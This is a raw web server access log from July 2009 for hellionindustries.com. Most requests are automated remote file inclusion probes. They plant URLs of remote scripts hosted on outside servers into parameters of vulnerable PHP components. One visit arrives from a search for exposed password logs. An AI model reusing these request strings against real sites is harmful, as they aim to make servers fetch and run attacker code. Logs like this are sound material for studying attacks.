218.234.21.178 - - [04/Jul/2009:07:39:10 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:10 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:11 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /logs/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:39:15 -0700] "GET /logs/access.log%20%20/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:15 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:15 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:16 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:39:16 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
118.96.16.142 - - [04/Jul/2009:07:40:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b99) Gecko/20090605 Firefox/3.5b99" "www.hellionindustries.com"
217.125.38.117 - - [04/Jul/2009:07:40:18 -0700] "GET /index1.php?menu=http://www.animeforum.com/impex/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:42:03 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:42:03 -0700] "GET /logs/access_090212.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:42:03 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
218.234.21.178 - - [04/Jul/2009:07:42:03 -0700] "GET /logs/access_090521.log//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:44:12 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
208.80.195.36 - - [04/Jul/2009:07:44:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; ZangoToolbar 4.8.2; .NET CLR 1.1.4322)" "www.hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:44:51 -0700] "GET /logs/access.log/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:45:57 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:46:22 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
91.121.89.135 - - [04/Jul/2009:07:47:04 -0700] "GET /logs/access.log/?sourcedir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:28 -0700] "GET /include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:28 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:28 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:32 -0700] "GET /include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:32 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:47:32 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:07 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:07 -0700] "GET /logs/access.log/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:07 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:09 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:09 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:49:19 -0700] "GET /logs/access.log/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:49:46 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:50:15 -0700] "GET /logs/access.log/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:50:16 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:50:19 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:51:04 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:51:05 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:07:52:47 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:07:54:49 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:55:26 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:55:27 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:07:55:27 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:55:49 -0700] "GET /?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:55:49 -0700] "GET /logs/access.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
61.78.62.84 - - [04/Jul/2009:07:55:49 -0700] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 200 1653 "-" "Mozilla/5.0" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:07:59:35 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:08:00:28 -0700] "GET /logs/access.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:08:00:28 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:08:00:28 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:01:29 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:01:29 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
61.17.93.169 - - [04/Jul/2009:08:02:05 -0700] "GET /logs/access.log HTTP/1.1" 200 86973 "http://www.google.co.in/search?hl=en&q=filetype%3Alog+inurl%3A*password.log%22&btnG=Google+Search&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" "www.hellionindustries.com"
61.17.93.169 - - [04/Jul/2009:08:02:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" "www.hellionindustries.com"
61.17.93.169 - - [04/Jul/2009:08:02:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8" "www.hellionindustries.com"
208.80.195.40 - - [04/Jul/2009:08:02:54 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; IEMB3; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)" "hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:08:03:04 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
87.106.249.217 - - [04/Jul/2009:08:03:04 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.184.72.18 - - [04/Jul/2009:08:03:32 -0700] "GET /logs/access.log//include/mail.inc.php?skin_board_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
65.55.106.230 - - [04/Jul/2009:08:04:03 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:04:33 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
65.55.106.238 - - [04/Jul/2009:08:06:33 -0700] "GET / HTTP/1.1" 200 779 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:09:28 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:09:29 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:09:29 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:09:30 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:11:11 -0700] "GET /logs/access.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:11:11 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:11:12 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:19:04 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:19:04 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:24:22 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:24:23 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
59.125.5.1 - - [04/Jul/2009:08:29:52 -0700] "GET /logs/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
59.125.5.1 - - [04/Jul/2009:08:29:52 -0700] "GET /logs/access.log/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
59.125.5.1 - - [04/Jul/2009:08:29:52 -0700] "GET /dm-albums/dm-albums.php?download=yes&file=config.php&currdir=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:30:34 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
110.45.138.139 - - [04/Jul/2009:08:30:34 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:12 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:12 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:13 -0700] "GET /logs/access.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:27 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:27 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:35:27 -0700] "GET /logs/access.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
194.109.22.67 - - [04/Jul/2009:08:37:45 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.67 - - [04/Jul/2009:08:37:45 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.117 - - [04/Jul/2009:08:37:52 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.117 - - [04/Jul/2009:08:37:53 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.109 - - [04/Jul/2009:08:38:03 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.109 - - [04/Jul/2009:08:38:06 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:38:12 -0700] "GET /index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:38:12 -0700] "GET /logs/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:08:40:00 -0700] "GET /index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
124.0.136.1 - - [04/Jul/2009:08:40:00 -0700] "GET /logs/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:40:21 -0700] "GET /phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:40:21 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:40:21 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:32 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:32 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:32 -0700] "GET /logs/access.log//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
80.247.76.181 - - [04/Jul/2009:08:41:36 -0700] "GET /logs/access_090212.log/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
213.201.230.140 - - [04/Jul/2009:08:41:42 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "hellionindustries.com"
213.201.230.140 - - [04/Jul/2009:08:41:42 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:47 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:47 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
72.29.81.145 - - [04/Jul/2009:08:41:47 -0700] "GET /logs/access.log//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:08:42:48 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:08:42:48 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
60.43.229.5 - - [04/Jul/2009:08:42:48 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "hellionindustries.com"
62.193.216.69 - - [04/Jul/2009:08:43:28 -0700] "GET /logs/access.log///tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
62.193.216.69 - - [04/Jul/2009:08:43:28 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
62.193.216.69 - - [04/Jul/2009:08:43:28 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.hellionindustries.com"
194.109.22.67 - - [04/Jul/2009:08:46:01 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
194.109.22.67 - - [04/Jul/2009:08:46:01 -0700] "GET /logs/phphtml.php?htmlclass_path=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.hellionindustries.com"
